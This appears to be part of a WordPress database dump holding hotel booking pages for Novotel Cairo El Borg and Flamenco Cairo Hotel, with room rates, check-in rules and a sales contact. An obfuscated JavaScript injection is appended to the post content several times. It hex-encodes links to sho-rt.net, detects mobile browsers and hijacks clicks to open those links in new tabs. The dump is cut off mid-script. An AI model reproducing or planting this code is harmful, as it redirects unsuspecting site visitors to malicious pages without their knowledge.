_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Flamenco Cairo Hotel','','inherit','closed','closed','','4725-revision-v1','','','2023-06-21 23:13:11','2023-06-21 23:13:11','',4725,'https://gsw2023.com/?p=4728',0,'revision','',0),
(4729,1,'2023-06-21 23:41:44','2023-06-21 23:41:44','<p>[vc_row][vc_column][vc_column_text]</p>\n<p><!-- wp:paragraph --><strong>BOOKING</strong> <strong>NOW</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong>Daily Room Rate:<br />Superior Single City Room 105 USD<br />Superior Double City Room 120 USD</strong></p>\n<!-- /wp:paragraph -->\n<!-- wp:list -->\n<ul>\n<li style=\"list-style-type: none;\">\n<ul><!-- wp:list-item --></p>\n<li>Above mentioned rates are per room per night based on bed and breakfast<br />basis, Exclusive of service charge and taxes.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li>Applicable supplement:<br />Nile View supplements USD 30.00 per room, all inclusive<br />of taxes.</li>\n</ul>\n</li>\n</ul>\n<!-- /wp:list-item -->\n<!-- /wp:list -->\n<!-- wp:list -->\n<ul>\n<li style=\"list-style-type: none;\">\n<ul><!-- wp:list-item --></p>\n<li>HB supplements USD 30.00 per person, all<br />inclusive of taxes.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li><strong>Children policy:<br /></strong>00-11.99 years free of charge sharing parents\' room up to two children.<br />Check-in &amp; Check-out:<br />Check-in time 15:00 hrs.<br />Check-out time 12:00 hrs.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li>1- Early check-in {subject to the hotel availability}:<br />For early check in between 08:00 hrs. and 14.00 hrs, a US $50.00<br />supplement will apply.<br />For a guaranteed arrival and check in before 08:00 hrs, please reserve the<br />room from the night before.<br />2- Late check-out {subject to the hotel availability}:<br />For check outs between 12:00 hrs and 16.00 hrs a US $50.00 supplement<br />will apply.<br />For check outs between 16:00 hrs and 20.00 hrs a US $70.00 supplement<br />will apply.<br />For all late departure requests after 20:00 hrs, a full night’s accommodation<br />charge will be applied.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li><strong>Terms &amp; Benefits:<br /></strong>∙ Payment is required a week before arrival via payment link will be send by<br />our reservation team<br />∙ Maximum release date will be 15/8/2023<br />∙ 06 days prior will be subject to first night value cancellation fees for every<br />room canceled.<br />∙ no show will be subject to full accommodation value cancellation fees for<br />every room canceled.<br />∙</li>\n</ul>\n</li>\n</ul>\n<!-- /wp:list-item -->\n<!-- /wp:list -->\n<p><!-- wp:paragraph -->Any amendments after 15/8/2023 the hotel offer will be released and the<br />hotel will have the right to consider your amendment request as a new request and<br />will be subject to the hotel updated rates strategy &amp; availability.</p>\n<!-- /wp:paragraph -->\n<p class=\"m_9177751281847961512xwordsection1\"><b><span lang=\"EN-US\">Hoping the above would meet with your satisfaction and looking forward to receive a positive reply with your acceptance latest by 22/06/2023 Max by 03:00 PM in order to reply back with the hotel confirmation, otherwise the hotel will consider this offer invalid with no further notices.</span></b><u></u><u></u></p>\n<h5> </h5>\n<h5 class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"FR\">For More Information </span><u></u><u></u></strong><span lang=\"EN-US\"><strong> :</strong><u></u><u></u></span></h5>\n<div>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">Mr. Mohamed Hamdy</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">Sales Manager</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">NOVOTEL Cairo El Borg</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">3 Saraya El Gezirah street  Zamalek Cairo  EGYPT</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">Mobile: +201020703020 Tel: +202 27356725</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\"><a href=\"http://novotel.com/NovotelCairoElBorg\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=http://novotel.com/NovotelCairoElBorg&amp;source=gmail&amp;ust=1690953974538000&amp;usg=AOvVaw2yZqu-UyY176LNaIxBFV6P\">novotel.com/NovotelCairoElBorg</a></span></strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NOVOTEL CAIRO EL BORG','','publish','closed','closed','','novotel-cairo-el-borg','','','2023-08-01 05:41:43','2023-08-01 05:41:43','',0,'https://gsw2023.com/?page_id=4729',0,'page','',0),
(4730,1,'2023-06-21 23:39:28','2023-06-21 23:39:28','','NoVOTE','','inherit','open','closed','','novote','','','2023-06-21 23:39:28','2023-06-21 23:39:28','',4729,'https://gsw2023.com/wp-content/uploads/2023/06/NoVOTE.jpg',0,'attachment','image/jpeg',0),
(4732,1,'2023-06-21 23:41:44','2023-06-21 23:41:44','<!-- wp:paragraph -->\n<p><strong>BOOKING</strong> <strong>NOW</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Daily Room Rate:<br>Superior Single City Room 105 USD<br>Superior Double City Room 120 USD</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>Above mentioned rates are per room per night based on bed and breakfast<br>basis, Exclusive of service charge and taxes.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Applicable supplement:<br>Nile View supplements USD 30.00 per room, all inclusive<br>of taxes.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>HB supplements USD 30.00 per person, all<br>inclusive of taxes.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Children policy:<br></strong>00-11.99 years free of charge sharing parents\' room up to two children.<br>Check-in &amp; Check-out:<br>Check-in time 15:00 hrs.<br>Check-out time 12:00 hrs.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>1- Early check-in {subject to the hotel availability}:<br>For early check in between 08:00 hrs. and 14.00 hrs, a US $50.00<br>supplement will apply.<br>For a guaranteed arrival and check in before 08:00 hrs, please reserve the<br>room from the night before.<br>2- Late check-out {subject to the hotel availability}:<br>For check outs between 12:00 hrs and 16.00 hrs a US $50.00 supplement<br>will apply.<br>For check outs between 16:00 hrs and 20.00 hrs a US $70.00 supplement<br>will apply.<br>For all late departure requests after 20:00 hrs, a full night’s accommodation<br>charge will be applied.<br></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Terms &amp; Benefits:<br></strong>∙ Payment is required a week before arrival via payment link will be send by<br>our reservation team<br>∙ Maximum release date will be 15/8/2023<br>∙ 06 days prior will be subject to first night value cancellation fees for every<br>room canceled.<br>∙ no show will be subject to full accommodation value cancellation fees for<br>every room canceled.<br>∙ </li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Any amendments after 15/8/2023 the hotel offer will be released and the<br>hotel will have the right to consider your amendment request as a new request and<br>will be subject to the hotel updated rates strategy &amp; availability.<br>Hoping the above would meet with your satisfaction and looking forward to<br>receive a positive reply with your acceptance latest by 22/06/2023 Max by<br>03:00 PM in order to reply back with the hotel confirmation, otherwise the<br>hotel will consider this offer invalid with no further notices.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x